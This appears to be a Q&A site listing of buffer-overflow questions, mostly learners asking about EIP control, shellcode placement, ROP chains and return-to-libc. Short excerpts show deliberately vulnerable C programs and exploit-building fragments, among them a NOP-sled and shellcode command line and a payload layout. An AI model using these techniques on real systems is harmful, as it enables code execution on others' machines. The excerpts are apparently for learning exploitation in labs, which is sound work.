Questions tagged [buffer-overflow]
A buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory.
513 questions
3
votes
1
answer
1k
views
Buffer overflow: How is it actually implemented in a pen testing environment?
Background:
So when exploiting a Buffer Overflow vulnerability, the attacker needs to
not only generate the payload (Let's say to create a binding shell), but also set up the corrupted buffer with ...
- 375
3
votes
1
answer
8k
views
Buffer overflow: Why does the ESP Register change its value after access violation
Background: Currently trying to exploit a BoF vulnerability. After setting up the environment, running a compiled C program that contains the strcpy function, I disassembled the program as it's ...
- 375
6
votes
1
answer
581
views
How do I organize my input for a buffer overflow?
I have a 32 bit linux binary that is susceptible to a buffer overflow. I figured out I need to input 1040 bytes before I can control the EIP register.
I have a shellcode size of 28 bytes. How do I ...
- 161
2
votes
2
answers
4k
views
Shellcode doesn't execute and EIP is overwritten
I've written a vulnerable program (below) and some shellcode (also below) to use in a buffer overflow exploit. I've had the same problems as in this link, and solved those using the answers there (-z ...
2
votes
1
answer
2k
views
trying to buffer overflow simple c program
i'm having problem to buffer overflow a simple c program that takes input from command line, this is the main.c code:
#include <stdio.h>
#include <string.h>
void func(char *name)
{
...
- 35
19
votes
5
answers
6k
views
Is it possible to find a buffer overflow in WordPress?
I had an interesting conversation with a pentester who told me he had found a buffer overflow in Wordpress. The person in question was really adamant that this was true. The client is a bit skeptical ...
- 929
-2
votes
2
answers
5k
views
Why do we use little endian in buffer overflow attacks? [closed]
Why in buffer overflow attacks do we reverse the address? Why do we use little endian format?
- 21
1
vote
2
answers
7k
views
Buffer overflow due to strlen, strcpy, strcat
I'm new to secure code review. I know that strlen will calculates the length until it finds a null character. This is a part of a larger code.
char* executeMount(char* password, char* path, int ...
- 11
1
vote
1
answer
1k
views
Bufferoverflow example on 64 bit Linux
I am attempting to learn about buffer overflows. I have written a simple C program that calls a function called checkpw() which allocates a char array of 10 bytes large. When I analyze the op code I ...
- 121
1
vote
1
answer
2k
views
Why do registers get overwritten upon overflow?
I know that upon a overflow, the stack gets partially overwritten, but I do not understand why registers such as EIP or RIP get changed in this process.
How come some registers are modified by such ...
- 229
2
votes
1
answer
579
views
control flow (buffer overflow) (introductory question)
I'm looking at the following code and am trying to figure out how this bug would be helpful for something like launching a shell.
int func(int i, double *data1, double data2)
{
double *p = data1; ...
0
votes
1
answer
641
views
Buffer overflow, SIGV fault at wrong address
I'm trying to understand why my buffer overflow will not work. I've been strugling with this for a few days now, so thought it was about time to ask professionals. I've only recent began to understand ...
- 848
0
votes
1
answer
298
views
Is a filler needed in a buffer overflow exploit?
Why do I see a filler being used in some exploits?
Take as an example the code below:
exploit = junk + eip + nops + shellcode
fill = "\x43"*(BUF_SIZE-len(exploit))
buf = exploit + fill
I guess the ...
- 183
7
votes
1
answer
3k
views
Identifying vulnerabilities in simple program with malloc
My class is without a textbook, or any structured learning material for that matter. I am doing all my learning through googling and while I am picking it up as I am doing it, it is slow going to be ...
- 73
0
votes
2
answers
1k
views
Is arbitrary code execution possible using GOT overwrite with W^X enabled?
Is it possible to reliably execute arbitrary code from a single overwrite of the Global Offset Table when W^X is enabled? By "reliably" I mean assuming I control only the location pointed to by the ...
- 103
6
votes
2
answers
2k
views
How to Check Compilation Options For SO File - Android Application VA
During the security assessment of Android applications, I have encountered multiple instances where .so (Shared Objects) files are present in lib directory.
What can be possible security test cases ...
- 985
1
vote
1
answer
2k
views
Bufferoverflow - jmp esp. Do I need nops sled? Does call esp also work?
I'm learning about stack buffer overflow and I'd appreciate help.
I'm exploiting simple web server containing this log function. Argument s1 is the input that I supply via HTTP. Server is running on ...
6
votes
2
answers
47k
views
return to libc- finding libc's address and finding offsets
So I tried performing a return-to-libc according to https://sploitfun.wordpress.com/2015/05/08/bypassing-nx-bit-using-return-to-libc/ .
I found libc's address by using "ldd vuln", and found system's ...
- 73
3
votes
2
answers
7k
views
Cannot overwrite EIP in basic exploitation example
I'm trying to replicate a simple buffer overflow for which I have the following code (strcpy_ex.c):
#include <string.h>
int main( int argc, char** argv ) {
char buffer[500];
...
- 209
1
vote
0
answers
308
views
ROP chain. Somehow two bytes are overwritten
I am learning about ROP chains. I am facing a behavior I cannot explain.
This is my sample code:
int main(int argc, char* args[]) {
char text[200];
scanf("%s", text);
return 0;
}
I ...
- 183
9
votes
2
answers
1k
views
Trouble building a ROP chain
I am trying to exploit a small program. The program looks somewhat like this:
int func(void) {
char text[100];
scanf("%s", text);
return 0;
}
int foo(unsigned short rand) {
char ...
- 183
2
votes
1
answer
3k
views
Buffer Overflow memory address calculation on 64bit
I have a assignment where i must exploit a buffer overflow vulnerability on a remote machine. I have only execute permission on the program, so i cant use gdb. I managed to take control of the rip and ...
- 151
2
votes
2
answers
554
views
Can OSSEC detect buffer overflow attacks?
I am trying to detect buffer overflow by using OSSEC (a HIDS software) as mentioned in OSSEC rules example and OSSEC book.
How can I configure OSSEC for detect a simple buffer overflow example as the ...
- 201
1
vote
2
answers
2k
views
Buffer Overflow Basic
I am currently working on a buffer overflow using my own program to learn the very basics. I have already successfully executed functions already present in the code by overwrite RIP/EIP, but right ...
- 229
0
votes
1
answer
2k
views
Setting a return address in a simple C exploit
I have an vulnerable program exploitable through the cmdline:
./vuln $(perl -e 'print "\x90"x22'; cat shell; perl -e 'print "\x90"x22';perl -e 'print "\xf4\xdd\xff\xff\xff\x7f"')
���������������������...
- 89